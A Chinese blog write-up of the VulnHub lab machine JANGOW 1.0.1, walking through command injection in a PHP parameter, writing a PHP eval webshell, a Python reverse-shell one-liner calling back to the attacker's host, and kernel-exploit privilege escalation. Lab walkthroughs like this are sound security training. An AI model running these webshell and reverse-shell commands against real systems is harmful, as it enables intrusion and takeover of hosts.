首页 > 其他分享 >vulnhub靶场 --> JANGOW: 1.0.1

vulnhub靶场 --> JANGOW: 1.0.1

时间:2023-01-31 13:15:17浏览次数:55  
标签:发现 shell 1.0 socket -- 写入 端口 vulnhub 连接

靶机下载地址

JANGOW: 1.0.1 < 点我下载

开始打靶

IP发现

nmap扫描网段发现靶机ip:192.168.111.140

端口发现

对靶机进行常规端口扫描

访问网站

访问80端口发现是个目录遍历:http://192.168.111.140/

点击 site目录进入一个wordpress搭建的站点

由于黑盒测试的习惯,到处点点,发现可疑接口:http://192.168.111.140/site/busque.php?buscar=

 对变量buscar进行测试,输入1没回显,尝试输入id,得到回显

该接口存在任意命令执行漏洞(RCE)

输入 ls 获取当前接口所在目录:site目录

写入webshell

写入一句话木马:echo '<?php @eval($_POST["spmonkey"]);?>' > shell.php,输入 ls 确认是否写入成功

写入成功,蚁剑连接,发现连接失败,改一下payload重新写入:echo '<?php @eval($_POST["spmonkey"]);' > shell.php,重新连接,连接成功

在普通用户目录下发现一个user.txt

打开是一串md5

去解密发现是空密码

不知道有啥用。。。

由于蚁剑无法回显一些报错或者输出,这里用nc反弹shell,但是试了多个方法都没反弹成功,写脚本测试一下端口是不是被限制了。

kali设置防火墙规则:iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234,然后监听1234端口:nc -lvvp 1234

目标主机创建sh脚本:

赋予权限并运行,静心等待(这全端口好慢啊~~~),脚本运行过程中会发现有个连接是连接成功的。

查看输出文件out.txt看看是哪个端口连接成功了。

因为对防火墙做了端口绑定,所以kali直接监听1234端口即可,目标主机连接kali的443端口即可反弹shell。

python反弹shell:python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

内核信息

提权

是ubuntu 16.04,查找相关漏洞利用

利用蚁剑上传

使用gcc编译

给它赋值权限并运行即提权成功

查看root目录,发现有个txt文件,打开发现也是一串md5,解密依然是空密码,估计这两个md5就是flag了

完成。

知识点归纳

1、IP发现
2、端口扫描
3、黑盒测试
4、RCE利用
5、木马连接
6、nc反弹shell
7、权限提升

 

标签:发现,shell,1.0,socket,--,写入,端口,vulnhub,连接
From: https://www.cnblogs.com/spmonkey/p/17077349.html

相关文章

  • 运维实践 | OpenMLDB 跨机房容灾方案
    背景在单集群部署环境下,OpenMLDB具备集群内节点级别的高可用能力。但若受到机房断电或者自然灾害等不可抗拒因素,则将造成的机房或大部分节点无法正常运转的情况,从而引发......
  • [LeetCode] 1626. Best Team With No Conflicts
    Youarethemanagerofabasketballteam.Fortheupcomingtournament,youwanttochoosetheteamwiththehighestoverallscore.Thescoreoftheteamisthe......
  • 扒一扒Bean注入到Spring的那些姿势,你会几种?
    大家好,我是三友~~这篇文章我准备来扒一扒Bean注入到Spring的那些姿势。其实关于Bean注入Spring容器的方式网上也有很多相关文章,但是很多文章可能会存在以下常见的问题......
  • 垃圾收集器必问系列—G1
    本文已收录至Github,推荐阅读......
  • 基于Spring Cache实现Caffeine、jimDB多级缓存实战
    作者:京东零售王震背景在早期参与涅槃氛围标签中台项目中,前台要求接口性能999要求50ms以下,通过设计Caffeine、ehcache堆外缓存、jimDB三级缓存,利用内存、堆外、jimDB缓存不......
  • Linux——MySQL主从复制读写分离
     主从复制用来保证数据的一致性和完整性 主从复制原理:主MySQL需要开启二进制日志保存用户对Mysql数据的操作。   从数据库监听主MySQL日志变化,发现更新复制日志......
  • C代码模拟IOC
    C代码模拟IOC用途一个模块记录设备诸多状态,当任意一个状态发生变化时,会执行对应的回调操作实现思想将设备状态进行备份,如果设备最新状态变化,可以比较出哪个状态发生变......
  • lowbit
    求1最低位置(不打表)#include<iostream>#include<cmath>usingnamespacestd;intlowbit(intn){returnn&-n;}intposof(intn){returnlog10(n)/......
  • Floorplan Manager for Web Dynpro ABAP
    https://wiki.scn.sap.com/wiki/display/WDABAP/Floorplan+Manager+for+WebDynpro+ABAP FPM是一个用来创建WEB应用的框架。他基于SAPWDA,并由WDA统一渲染。FPM负责了应......
  • Vulnhub之Cheran EE靶机详细测试过程(需要特别注意靶机的网络模式)
    CheranEE靶机信息名称:Cheran:1地址:https://www.vulnhub.com/entry/cheran-1,521/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Cheran]└─$sudonetdiscover-i......